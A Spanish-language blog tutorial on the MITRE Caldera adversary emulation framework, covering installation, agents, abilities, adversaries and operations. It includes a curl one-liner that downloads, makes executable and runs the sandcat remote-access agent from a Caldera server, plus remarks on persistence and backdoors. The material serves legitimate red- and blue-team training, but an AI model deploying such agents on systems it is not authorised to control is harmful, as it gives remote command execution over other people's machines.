

<!DOCTYPE html>
<html lang="es" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Website/favicon.png">
  <link rel="icon" href="/img/Website/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="Caldera es un software de Emulación de Adversarios muy popular entre la comunidad de hackers trabajando en los equipos de Red Team, Blue Team y Incident Response.">
  <meta name="author" content="MelioD4rk">
  <meta name="keywords" content="">
  <meta name="description" content="Caldera es un software de Emulación de Adversarios muy popular entre la comunidad de hackers trabajando en los equipos de Red Team, Blue Team y Incident Response.">
<meta property="og:type" content="article">
<meta property="og:title" content="Caldera">
<meta property="og:url" content="http://meliod4rk.github.io/2021/11/18/Caldera/index.html">
<meta property="og:site_name" content="H4CK1NGT1M3">
<meta property="og:description" content="Caldera es un software de Emulación de Adversarios muy popular entre la comunidad de hackers trabajando en los equipos de Red Team, Blue Team y Incident Response.">
<meta property="og:locale" content="es_ES">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/agents.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/agents_conf.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/agents_deploy.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/agents_inst.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/abilities.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/abilities_tec.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/adversaries.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/operations.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/operations_creation.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/operations_example.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/access.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Tools/Caldera/trainning.png">
<meta property="article:published_time" content="2021-11-18T15:40:16.000Z">
<meta property="article:modified_time" content="2025-03-03T17:36:10.349Z">
<meta property="article:author" content="MelioD4rk">
<meta property="article:tag" content="Tool">
<meta property="article:tag" content="IR">
<meta property="article:tag" content="Red Team">
<meta property="article:tag" content="Blue Team">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://meliod4rk.github.io/img/Tools/Caldera/agents.png">
  
  <title>Caldera - H4CK1NGT1M3</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"meliod4rk.github.io","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/Website/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>H4CK1NGT1M3</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archivos
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categorias
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                Sobre mí
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/Tools/Caldera/logo.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Caldera">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-11-18 16:40" pubdate>
        18 de noviembre de 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      5.6k wc
    </span>
  

  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Caldera</h1>
            
            <div class="markdown-body">
              <p>Caldera es un software de <strong>Emulación de Adversarios</strong> muy popular entre la comunidad de hackers trabajando en los equipos de Red Team, Blue Team y Incident Response.</p>
<h1 id="¿Como-instalar-Caldera"><a href="#¿Como-instalar-Caldera" class="headerlink" title="¿Como instalar Caldera?"></a>¿Como instalar Caldera?</h1><h2 id="Github-instalacion-Offline"><a href="#Github-instalacion-Offline" class="headerlink" title="Github / instalación Offline"></a>Github / instalación Offline</h2><ol>
<li>Clonamos el repositorio en nuestro equipo<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">git <span class="hljs-built_in">clone</span> https://github.com/mitre/caldera.git --recursive --branch 4.0.0-alpha<br></code></pre></td></tr></table></figure></li>
<li>Instalamos los requeriments.txt<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">pip3 install -r requirements.txt<br></code></pre></td></tr></table></figure></li>
<li>Levantamos el servidor de Caldera. Por defecto utiliza el puerto 8888 del localhost -&gt; <a target="_blank" rel="noopener" href="http://localhost:8888/">http://localhost:8888</a><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">python3 server.py --insecure<br></code></pre></td></tr></table></figure></li>
</ol>
<h2 id="Docker"><a href="#Docker" class="headerlink" title="Docker"></a>Docker</h2><p>Para la instalación, he seguido la web del siguiente enlace:<br><a target="_blank" rel="noopener" href="https://caldera.readthedocs.io/en/2.6.6/Docker-deployment.html">https://caldera.readthedocs.io/en/2.6.6/Docker-deployment.html</a></p>
<ol>
<li>Clonamos el repositorio en nuestro equipo<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">git <span class="hljs-built_in">clone</span> https://github.com/mitre/caldera.git --recursive --branch 4.0.0-alpha<br></code></pre></td></tr></table></figure></li>
<li>Como el repositorio de Github contiene un fichero Dockerfile, crearemos nuestra propia imagen de docker a partir de este fichero.<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker build . -t caldera:server<br></code></pre></td></tr></table></figure></li>
<li>Finalmente creamos el contenedor y levantamos el servidor de Caldera. Por defecto utiliza el puerto 8888 del localhost -&gt; <a target="_blank" rel="noopener" href="http://localhost:8888/">http://localhost:8888</a><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker run --name caldera -p 7010:7010 -p 7011:7011 -p 7012:7012 -p 8888:8888 caldera:server<br></code></pre></td></tr></table></figure></li>
<li>Para poder iniciar sesión, necesitamos de las credenciales de los usuarios <strong>red</strong> y <strong>blue</strong>. Se pueden obtener de la siguiente forma:<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker <span class="hljs-built_in">exec</span> -it caldera bash<br>tail -5 /usr/src/app/conf/local.yml<br></code></pre></td></tr></table></figure></li>
</ol>
<h1 id="Agentes"><a href="#Agentes" class="headerlink" title="Agentes"></a>Agentes</h1><p>Un agente es un <strong>Troyano de Acceso Remoto (RAT)</strong> que deberemos instalar de forma temporal en los equipos que queramos simular técnicas tanto de ataque como de defensa. Este troyano no lo identifiqueis como algo malicioso para el equipo, es la forma que tiene el software de poder comunicarse con el equipo y poder simular los ataques.<br><img src="/img/Tools/Caldera/agents.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 1: Menu de agentes"></p>
<p>En el botón de configuración se podrá definir el tiempo de vida de los agentes en los equipos y el nombre por defecto que van a utilizar. Además permite que estos agentes de base implementen una serie de habilidades, que por defecto no le vamos a añadir ninguna.<br><img src="/img/Tools/Caldera/agents_conf.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 2: Configuración de agentes"></p>
<p>En el primer desplegable aparecerán varios tipos de agente en función del tipo de conexión que queramos establecer. Pensando con mentalidad de pentenster, una vez lograsemos explotar un sistema, deberiamos buscar formas de ganar persistencia, como por ejemplo: crear diferentes backdoors o puertas traseras para que en caso de ser detectados y erradicados del sistema, aún tengamos otros mecanismos para seguir permaneciendo y conectándonos a él. El troyano <strong>54ndc47</strong> o <strong>sandcat</strong> es el más utilizado para aprender a utilizar la herramienta.<br><img src="/img/Tools/Caldera/agents_deploy.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 3: Creación de agentes"></p>
<p>Finalmente, deberiamos copiar el codigo que aparece en la imagen o a continuación, para que el equipo indicado aparezca en el menú de agentes:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">server=<span class="hljs-string">&quot;http://0.0.0.0:8888&quot;</span>;curl -s -X POST -H <span class="hljs-string">&quot;file:sandcat.go&quot;</span> -H <span class="hljs-string">&quot;platform:darwin&quot;</span> <span class="hljs-variable">$server</span>/file/download &gt; Atrox;chmod +x Atrox;./Atrox -server <span class="hljs-variable">$server</span> -v<br></code></pre></td></tr></table></figure>
<p><img src="/img/Tools/Caldera/agents_inst.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 4: Agente instalado"></p>
<h1 id="Habilidades"><a href="#Habilidades" class="headerlink" title="Habilidades"></a>Habilidades</h1><p>Las habilidades son las diferentes técnicas que han sido reconocidas en el framework de MITRE&amp;TTACk por haberse utilizado durante diferentes tipos de ataques.<br>Los diferentes plugins añaden nuevas técnicas al framework de Caldera. Los módulos que incluyen el mayor número de técnicas son Atomic Red Team y Stockpile.<br><img src="/img/Tools/Caldera/abilities.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 5: Menu de habilidades"></p>
<p>El buscador de Caldera nos permite buscar a grandes rasgos habilidades por su nombre o su ID respectivo de MITRE. Esta imagen es un ejemplo de en qué consiste latécnica “T1082 - Hostname Discovery”.<br><img src="/img/Tools/Caldera/abilities_tec.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 6: Habilidad T1082"></p>
<p>Otra forma más efectiva de buscar las técnicas que ejecutan un comando en especifico, es haciendo uso de la terminal y un poco de bash scripting.<br>Por ejemplo, si quisiesemos hacer una búsqueda de las técnicas que utilizan el uso del comando “whoami”, deberíamos escribir en la terminal:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -rl <span class="hljs-string">&quot;whoami&quot;</span> /usr/src/app/plugins/stockpile/data/abilities/ | xargs head -n5<br></code></pre></td></tr></table></figure>
<p>Como resultado, obtendríamos las 3 técnicas que contienen el comando:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs bash">==&gt; /usr/src/app/plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml &lt;==<br>---<br><br>- id: c0da588f-79f0-4263-8998-7496b1a40596<br>  name: Identify active user<br>  description: Find user running agent<br><br>==&gt; /usr/src/app/plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml &lt;==<br>---<br><br>- id: bd527b63-9f9e-46e0-9816-b8434d2b8989<br>  name: Current User<br>  description: Obtain user from current session<br><br>==&gt; /usr/src/app/plugins/stockpile/data/abilities/collection/55678719-e76e-4df9-92aa-10655bbd1cf4.yml &lt;==<br>--- <br>- id: 55678719-e76e-4df9-92aa-10655bbd1cf4<br>  description: User enumeration<br>  name: cmd.exe information gathering<br>  tactic: collection<br></code></pre></td></tr></table></figure>

<h1 id="Adversarios"><a href="#Adversarios" class="headerlink" title="Adversarios"></a>Adversarios</h1><p>Los adversarios son perfiles de atacantes creados por los desarrolladores que engloban una serie de técnicas acorde a atacantes específicos. Esta herramienta nos permite crear nuestros propios adversarios y testear:</p>
<ul>
<li>Técnicas de red team sin tener conocimiento de los comandos que ejecuta realmente un atacante. Esto permite a un usuario de Blue Team comprobar de manera fácil y rápida que tan vulnerable es un sistema ante esos ataques. </li>
<li>Técnicas de blue team, cuando instalamos el agente de Blue el objetivo es -&gt; como atacante, ver que información puedo obtener de un sistema o aprender nuevos mecanismos para bypasear X protecciones<br>donde se busca bypasear un sistema protegido por los mecanismos establecidos del agente.</li>
</ul>
<p>Un ejemplo de adversario es “Noisy Neighbor”, que utiliza técnicas de reconocimiento las cuales mcuhas de ellas son facilmente detectables.<br><img src="/img/Tools/Caldera/adversaries.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 7: Adversario Noisy Neighbor"></p>
<h1 id="Operaciones"><a href="#Operaciones" class="headerlink" title="Operaciones"></a>Operaciones</h1><p>Las operaciones son ataques emulados dirigidos a un grupo o varios grupos de equipos donde tengamos instalado los agentes.<br><img src="/img/Tools/Caldera/operations.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 8: Menú Operaciones"></p>
<p>Deberemos definir un nombre a dicha operación, seleccionar uno de los atacantes creados por defecto o uno creado por nosotros mismos, los grupos a los que afecta dicha operación (el grupo se define en el apartado de Agentes) y muy importante marcar la opción de Auto-close como en la siguiente imagen.<br><img src="/img/Tools/Caldera/operations_creation.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 9: Creación de Operaciones"></p>
<p>Cuando empezemos la operación aparecerá un menú como el de la siguiente imagen. Muestra paso a paso la técnica que se va utilizando, el dispositivo donde se realiza, el comando ejecutado y el restultado de dicho comando.<br><img src="/img/Tools/Caldera/operations_example.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 10: Operación M4K4RR0N"></p>
<h1 id="Acceso"><a href="#Acceso" class="headerlink" title="Acceso"></a>Acceso</h1><p>El apartado Access utiliza la conexión establecida con el dispositivo que seleccionemos y ofrece la posibilidad de ejecutar técnicas dirigidas de forma manual e individual aprovechando el canal de C2 del agente instalado.<br><img src="/img/Tools/Caldera/access.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 11: Menú Acceso"></p>
<h1 id="Entrenamiento"><a href="#Entrenamiento" class="headerlink" title="Entrenamiento"></a>Entrenamiento</h1><p>Finalmente está el apartado de entrenamiento, donde tendremos diferentes certificados enfocados tanto para uso de la aplicación a nivel de <strong>usuario</strong> como una certificación específica para <strong>Blue</strong>.<br><img src="/img/Tools/Caldera/trainning.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 12: Menú Entrenamiento"></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Tools/">Tools</a>
                    
                      <a class="hover-with-bg" href="/categories/Tools/Adversary-emulator/">Adversary emulator</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Tool/">Tool</a>
                    
                      <a class="hover-with-bg" href="/tags/IR/">IR</a>
                    
                      <a class="hover-with-bg" href="/tags/Red-Team/">Red Team</a>
                    
                      <a class="hover-with-bg" href="/tags/Blue-Team/">Blue Team</a>
                    
                  </div>
                
              </div>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/31/Pandora/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Pandora</span>
                        <span class="visible-mobile">Anterior</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/11/07/Cyber-Kill-Chain/">
                        <span class="hidden-mobile">Cyber Kill Chain</span>
                        <span class="visible-mobile">Siguiente</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;Tabla de contenido</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Buscar</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <i class="iconfont icon-github-fill"></i> <a href="https://github.com/MelioD4rk" target="_blank" rel="nofollow noopener"><span>MelioD4rk</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
